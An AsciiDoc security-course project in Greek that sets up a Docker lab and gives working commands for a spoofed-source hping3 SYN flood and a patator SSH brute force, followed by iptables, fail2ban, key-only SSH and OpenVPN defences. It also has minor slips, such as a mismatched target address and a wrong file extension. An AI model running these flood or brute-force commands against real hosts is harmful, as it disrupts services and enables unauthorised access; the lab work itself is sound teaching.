Docker implemented tasks for computer security
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

427 lines
19 KiB

:stylesheet: ~/Desktop/test_ascii/ubuntu.css
:toc: right
:toc-title: Πίνακας περιεχομένων
:toclevels: 4
:sectnums:
:icons: font
:tabs:
:imagesdir: ./images
= Εργασία Εξαμήνου
Ασφάλεια Δικτύων και Επικοινωνιών +
Μωυσόγλου Σταύρος +
ΑΜ: 171149
[NOTE]
[.text-center]
Εργαλεία που θα χρειαστούν για την εκτέλεση όλων των λειτουργιών σε όλα τα συστήματα μπορούμε να τα εγκαταστήσουμε
με τις παρακάτω εντολές: +
Για το κύριο σύστημά μας: +
sudo apt update +
sudo apt install ascii-doctor.pdf +
sudo apt install openvpn +
sudo apt install fail2ban +
sudo apt install nano +
Για κάθε σμήνος: +
sudo apt update +
sudo apt install nano +
sudo apt install hping3 +
sudo apt install openvpn +
sudo apt install patator +
sudo apt install fail2ban +
sudo apt install crunch
== Docker
Ο πλήρης οδηγός για την εγκατάσταση του Docker βρίσκεται στην ιστοσελίδα http://docs.swarmlab.io/SwarmLab-HowTos/labs/Howtos/docker/install.adoc.html +
Προυποθέτοντας ότι έχει ολοκληρωθεί η εγκατάσταση, από τον φάκελο sec_proj +
ενεργοποιούμαι δύο υπολογιστές: +
----
*./usr/share/swarmlab.io/sec/swarmlab-sec up size=2* +
----
Κάνουμε login στο master container: +
----
*./usr/share/swarmlab.io/sec/swarmlab-sec login*
----
== Dos/DDos Attacks
=== Επίθεση Dos
Τρέχουμε τις παρακάτω εντολές : +
[listing]
Τρέχουμε την εντολή *ifconfig* για να βρούμε την IP του master container: +
Στην προκειμένη περίπτωση έχουμε πάρει την IP 172.25.0.2 +
Εκτελούμε την εντολή nmap για να βρούμε την IP του 2ου container: +
[listing]
nmap -sP 172.25.0.*
Κάνουμε login στο 2ο container:
[listing]
ssh docker@172.25.0.3
Αρχίζουμε επίθεση τύπου SYN flood attack από το master container με την εντολή:
----
hping3 -d 256 -S -p 80 --flood --rand-source 172.25.0.3
----
όπου:
*-d*: το μέγεθος των πακέτων που θα είναι 256 bytes +
*-S*: θα σταλθούν πακέτα SYN +
*-p*: στόχος η πόρτα 80 +
*--flood*: θα στέλνει γρήγορα πακέτα χωρίς να ενημερώνει πίσω +
*--rand-source*: θα στέλνει πακέτα με διαφορετικές source IP για να κρύψουμε την πραγματική
και ακολουθεί η destination IP 172.25.0.3
Θα στείλουμε πάρα πολλά αιτήματα μέχρις ότου ο τελικός +
υπολογιστής να μην μπορεί να ανταποκριθεί από τα πολλά αιτήματα
Για να παρακολουθήσουμε τα πακέτα που παραλαμβάνει ο 172.25.0.3 εκτελούμε:
----
sudo tcpdump -n -l όπου:
-n: ώστε να μην μετατρέπει τις διευθύνσεις σε host name
-l: stdout γραμμή ανά γραμμή για να είναι ευανάγνωστο
----
και θα λάβουμε μια απεριόριστη λίστα με όλες τις κινήσεις μεταξύ +
των δύο containers με διαφορετική source address απο την μεριά του master container:
----
21:24:49.173526 IP 172.27.0.3.80 > 13.245.207.57.6240: Flags [R.], seq 0, ack 1645404442, win 0, length 0
21:24:49.173585 IP 254.109.233.34.6241 > 172.27.0.3.80: Flags [S], seq 425760265:425760521, win 512, length 256: HTTP
21:24:49.173589 IP 172.27.0.3.80 > 254.109.233.34.6241: Flags [R.], seq 0, ack 425760522, win 0, length 0
21:24:49.173634 IP 84.75.97.186.6242 > 172.27.0.3.80: Flags [S], seq 2080045976:2080046232, win 512, length 256: HTTP
21:24:49.173639 IP 172.27.0.3.80 > 84.75.97.186.6242: Flags [R.], seq 0, ack 2080046233, win 0, length 0
21:24:49.173658 IP 133.166.126.38.6243 > 172.27.0.3.80: Flags [S], seq 209817745:209818001, win 512, length 256: HTTP
21:24:49.173663 IP 172.27.0.3.80 > 133.166.126.38.6243: Flags [R.], seq 0, ack 209818002, win 0, length 0
21:24:49.173710 IP 124.52.52.239.6244 > 172.27.0.3.80: Flags [S], seq 420259499:420259755, win 512, length 256: HTTP
21:24:49.173715 IP 172.27.0.3.80 > 124.52.52.239.6244: Flags [R.], seq 0, ack 420259756, win 0, length 0
21:24:49.173771 IP 111.231.152.219.6245 > 172.27.0.3.80: Flags [S], seq 996339210:996339466, win 512, length 256: HTTP
21:24:49.173776 IP 172.27.0.3.80 > 111.231.152.219.6245: Flags [R.], seq 0, ack 996339467, win 0, length 0
21:24:49.173819 IP 245.231.15.4.6246 > 172.27.0.3.80: Flags [S], seq 665144234:665144490, win 512, length 256: HTTP
21:24:49.173824 IP 172.27.0.3.80 > 245.231.15.4.6246: Flags [R.], seq 0, ack 665144491, win 0, length 0
21:24:49.173844 IP 15.240.107.243.6247 > 172.27.0.3.80: Flags [S], seq 1174216822:1174217078, win 512, length 256: HTTP
21:24:49.173851 IP 172.27.0.3.80 > 15.240.107.243.6247: Flags [R.], seq 0, ack 1174217079, win 0, length 0
----
=== Προστασία ενάντια Dos/DDos επιθέσεων
Θα χρησιμοποιηθούν iptable rules για να απορριφθούν τυχόν επιθέσεις +
που δέχεται το σύστημα μας. Ένας τρόπος είναι να απορρίψουμε πακέτα που δεν έχουν SYN flag +
και δεν έχουν πραγματοποιείσει TCP σύνδεση στο παρελθόν:
----
iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP
----
όπου: +
-t mangle: Διαχείριση πίνακα με τα ειδικά διαμορφωμένα πακέτα +
-Α: Προσθήκη καινούριου κανόνα +
PREROUTING: επεξεργασία πακέτου προτού δρομολογηθεί +
-m conntrack ( conntrack )Κομμάτι του linux υποσυστήματος για την καταγραφή συνδέσεων +
--ctstate INVALID: Αν η καταγραφή της σύνδεσης είναι άκυρη +
-j DROP: η ενέργεια που θα πραγματοποιηθεί, στην συγκεκριμένη περίπτωση αν δεν έχει βρεθεί η σύνδεση του
source IP το πακέτο απλά θα αγνοηθεί χωρίς να επιστρέψει σφάλμα +
Για συνδέσεις που είναι καινούριες προσθέτουμε :
----
iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
----
-p tcp ! --syn: Αν το πρωτόκολλο είναι TCP και το πακέτο δεν έχει SYN flag +
--ctstate NEW: Αν έχει καταγραφεί ως καινούρια η σύνδεση +
Για τα πακέτα που έχουν ψεύτικα ή ακόμη και καθόλου flags:
----
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
----
Τέλος, δεν θα δεχόμαστε ICMP pings για να μην δεχτούμε ICMP flood:
----
iptables -t mangle -A PREROUTING -p icmp -j DROP
----
Αν εφαρμόσουμε τους παραπάνω κανόνες με την ίδια εντολή hping3 λαμβάνουμε το παρακάτω αποτέλεσμα
----
03:40:17.786443 IP sec_proj_worker_1.sec_proj_net.22 > 2454e5f00a8b.57220: Flags [P.], seq 1:85, ack 44, win 501, options [nop,nop,TS val 160241560 ecr 1030425021], length 84
03:40:17.786463 IP 2454e5f00a8b.57220 > sec_proj_worker_1.sec_proj_net.22: Flags [.], ack 85, win 9803, options [nop,nop,TS val 1030425021 ecr 160241560], length 0
03:40:17.786609 IP 2454e5f00a8b.22 > sec_proj_worker_1.sec_proj_net.53334: Flags [P.], seq 1:85, ack 44, win 501, options [nop,nop,TS val 1030425021 ecr 160241559], length 84
03:40:17.786664 IP sec_proj_worker_1.sec_proj_net.53334 > 2454e5f00a8b.22: Flags [.], ack 85, win 9768, options [nop,nop,TS val 160241560 ecr 1030425021], length 0
03:40:18.606552 IP sec_proj_worker_1.sec_proj_net.53334 > 2454e5f00a8b.22: Flags [P.], seq 44:80, ack 85, win 9768, options [nop,nop,TS val 160242380 ecr 1030425021], length 36
03:40:18.606807 IP 2454e5f00a8b.57220 > sec_proj_worker_1.sec_proj_net.22: Flags [P.], seq 44:80, ack 85, win 9803, options [nop,nop,TS val 1030425841 ecr 160241560], length 36
03:40:18.607168 IP sec_proj_worker_1.sec_proj_net.22 > 2454e5f00a8b.57220: Flags [P.], seq 85:121, ack 80, win 501, options [nop,nop,TS
...
...
...
21 packets captured
883552 packets received by filter
883525 packets dropped by kernel
----
== SSH Brute Force
=== Patator
Για την επίτευξη της επίθεσης SSH Brute Force θα χρησιμοποιήσουμε το πρόγραμμα patator. Αρχικά θα πρέπει +
να του παρέχουμε ένα .txt αρχείο που θα περιέχει κωδικούς που θα δοκιμάζει για την εύρεση του σωστού κλειδιού για την +
σύνδεση στο στοχοποιημένο σύστημα. Δημιουργούμαι ένα τυχαίο .txt αρχείο με το πρόγραμμα crunch.
----
crunch 6 6 cdegijklopqr -o /root/wordlist.txt
----
*6 6* Θα δημιουργήσει λέξει το λιγότερο 6 χαρακτήρες και το πολύ 6 χαρακτήρες +
*cdegijklopqr* οι λέξεις θα περιέχουν τα γράμματα που έχουμε αποδώσει +
*-o /root/wordlist.txt* το όνομα και ο προορισμός του .txt file +
Αφού ολοκληρωθεί η διαδικασία δημιουργίας ενός λεξικού, θα σκανάρουμε με την εντολή *nmap -p 22 172.27.0.3* +
για να βρούμε ανοιχτές πόρτες που θα μας προσφέρουν την είσοδο σε μια υπηρεσία. Για την δική μας εργασία +
αρκεί να είναι ανοιχτή η πόρτα 22 που αντιστοιχεί στην πόρτα της υπηρεσίας SSH.
image:port22.png[]
Αρχίζουμε την επίθεση με την εντολή:
----
patator ssh_login host=172.27.0.3 user=docker password=FILE0 0=/root/wordlist.txt -x quit:mesg="SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3" -x ignore:code=1
----
όπου: +
*patator ssh_login*: Εντολή εκείνησης SSH Brute Force +
*host 172.27.0.3*: IP του στόχου μας +
*user=docker*: το username του στόχου +
*password=FILE0 0=/root/wordlist.txt*: το αρχείο που θα αντλήσει το πρόγραμμα τους τυχαίους συνδιασμούς κωδικών +
*x quit:mesg="SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3"*: όταν συνδεθεί επιτυχώς στο σύστημα θα τερματιστεί το πρόγραμμα +
*-x ignore:code=1*: δεν θα εκτυπώνει της αποτυχημένες προσπάθιες +
To πρόγραμμα θα μας εκτυπώσει στατιστικά δεδομένα μαζί και με την επιτυχημένη είσοδο και με ποιο κωδικό +
κατάφερε να τερματίσει.
image:patator.png[]
=== Προστασία ενάντια SSH Brute Force
Θα χρησιμοποιηθεί το πρόγραμμα Fail2Ban για την προστασία του συστήματός μας. Το fail2ban θα εντοπίζει αποτυχημένες προσπάθειες για +
είσοδο μέσο SSH και θα δίνει περιθώριο 3 προσπαθειών, αλλιώς θα προστεθεί κανόνας +
iptable που θα εμποδίζει την είσοδο του για ένα χρονικό περιθώριο. +
Ενεργοποιούμε την υπηρεσία fail2ban:
----
sudo systemctl enable fail2ban
sudo systemctl start fail2ban
----
Δημιουργούμε το αρχείο με τις παραμετροποιήσεις που επιθυμούμε στο φάκελο /etc/fail2ban/jail.d με όνομα sshd.local
----
nano /etc/fail2ban/jail.d/sshd.local
----
Προσθέτουμε τις ρυθμίσεις μας
----
[sshd]
enabled = true
port = ssh
action = iptables-multiport
logpath = /var/log/secure
maxretry = 3
bantime = 600
----
όπου: +
*port=ssh* Η πόρτα της υπηρεσίας ssh <=> 22 +
*action = iptables-multiport* Δημιουργία iptables για την απαγόρευση εισόδου +
*logpath = /var/log/secure* Αρχείο καταγραφής +
*maxretry = 3* Μέγιστος αριθμός προσπαθιών +
*bantime = 600* Χρόνος απαγόρευσης εισόδου 600 δευτερολέπτων +
Για κάθε αλλαγή θα πρέπει να επανεκκινηθεί η υπηρεσία με την εντολή
----
sudo systemctl restart fail2ban
----
Ξεκινάμε μια SSH Brute Force attack προς το κύριο σύστημα και παρατηρούμε ότι λόγο των πολλαπλών +
λανθασμένος δοκιμών έχει απαγορευτεί η δρομολόγηση αιτημάτων προς το προστατευόμενο σύστημα. +
Το επιβεβαιώνουμε με την εντολή *fail2ban-client status sshd*
image:fail2ban.png[]
=== SSH μόνο με key
Τροποποιούμε το αρχείο sshd_config και προσθέτουμε τις γραμμές:
----
PasswordAuthentication no
PubkeyAuthentication yes
----
Κάνουμε επανεκκίνιση τον sshd
----
systemctl restart sshd.service
----
Αν προσπαθήσουμε να πραγματοποιήσουμε είσοδο θα απορριφθεί το αίτημα.
image:ssh_denied.png[]
== VPN
=== Δημιουργία VPN
Δημιουργούμε δύο φακέλους στο directory του docker, το ένα με όνομα vpn και εσωτερικά +
openvpn-services. Επίσης δημιουργούμε το script του vpn όπου θα τρέξουν όλες οι εντολές +
για την δημιουργία του container και τις παραμετροποιήσεις του server. +
create-vpn.sh
----
#!/bin/bash
IP=127.0.0.1 # Server IP
P=1194 # Server Port
OVPN_SERVER='10.80.0.0/16' # VPN Network
#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/ # Dir to save data ** this must exist **
vpn_data=$PWD/openvpn-services/
if [ ! -d $vpn_data ]; then
mkdir -p $vpn_data
fi
NAME=swarmlab-vpn-services # name of docker service
DOCKERnetwork=swarmlab-vpn-services-network # docker network
docker=registry.vlabs.uniwa.gr:5080/myownvpn # docker image
docker stop $NAME #stop container
sleep 1
docker container rm $NAME #rm container
# rm config files
rm -f $vpn_data/openvpn.conf.*.bak
rm -f $vpn_data/openvpn.conf
rm -f $vpn_data/ovpn_env.sh.*.bak
rm -f $vpn_data/ovpn_env.sh
----
Δημιουργούμε ένα καινούριο δίκτυο στο Docker όπου θα εξυπηρετεί την υπηρεσία του vpn
----
sleep 1
docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork
----
*docker run --net=none*: Τρέχουμε την υπηρεσία του Docker +
*-v $vpn_data:/etc/openvpn*: Κάνει mount στον δίσκο μας για να αποθηκευτούν οι ρυθμίσεις μας στο $vpn_data:/etc/openvpn +
*-p 1194:1194*: Η πόρτα επικοινωνίας από τον εξωτερικό κόσμος είναι η 1194 και αντίστοιχα η πόρτα για το Docker δίκτυο η 1194 πάλι +
*$docker ovpn_genconfig*: Δημιουργεί το config για την openvpn υπηρεσία και ακολουθούν τα ορίσματα για να παραμετροποιήσουμε
όπως επιθημούμε την υπηρεσία
----
docker run --net=none -it -v $vpn_data:/etc/openvpn -p 1194:1194 --rm $docker ovpn_genconfig -u udp://$IP:$P \
-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER
----
Δημιουργία κλειδιού
----
docker run --net=none -v $vpn_data:/etc/openvpn --rm -it $docker ovpn_initpki
----
----
# see ovpn_copy_server_files
#docker run --net=none -v $vpn_data:/etc/openvpn --rm $docker ovpn_copy_server_files
#create vpn see --cap-add=NET_ADMIN
sleep 1
docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker
sudo sysctl -w net.ipv4.ip_forward=1
#show created
docker ps
----
=== Είσοδος χρήστη στο VPN δίκτυο
Θα πρέπει να φτιάξουμε ένα script αρχείο όπου θα δημιουργεί το config file που θα πρέπει να έχει +
ο χρήστης για να μπορεί να έχει πρόσβαση στο VPN δίκτυο. +
Δημιουργούμε το script αρχείο: +
create-user.sh
----
USERNAME=test1
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn
docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn
----
Τροποποιούμαι το αρχείο .ovpn ώστε να ανταποκρίνεται στον server μας προσθέτοντας +
τις παρακάτω εντολές :
----
client
nobind
dev tun
comp-lzo
resolv-retry infinite
keepalive 15 60
remote-cert-tls server
remote #IP xxx.χχχ.χχχ.χχχ #port χχχχχ udp #όπου προσθέτουμε την IP που τρέχουμε τον server και την πόρτα
float
----
Θα παραχθεί ένα .ovpn αρχείο το οποίο θα χρειαστεί ο χρήστης για την είσοδο του στο VPN δίκτυο. +
Αντιγράφουμε το αρχείο στο /project φάκελο του σμήνος και το μετατρέπουμε σε εκτελέσιμο. +
----
chmod +x test1.ovpn
----
Εγκαθηστούμε την υπηρεσία openvpn
----
sudo apt install openvpn
----
Κάνουμε σύνδεση με την παρακάτω εντολή
----
openvpn --config ./test1.vpn
----
image:openvpn_conn.png[]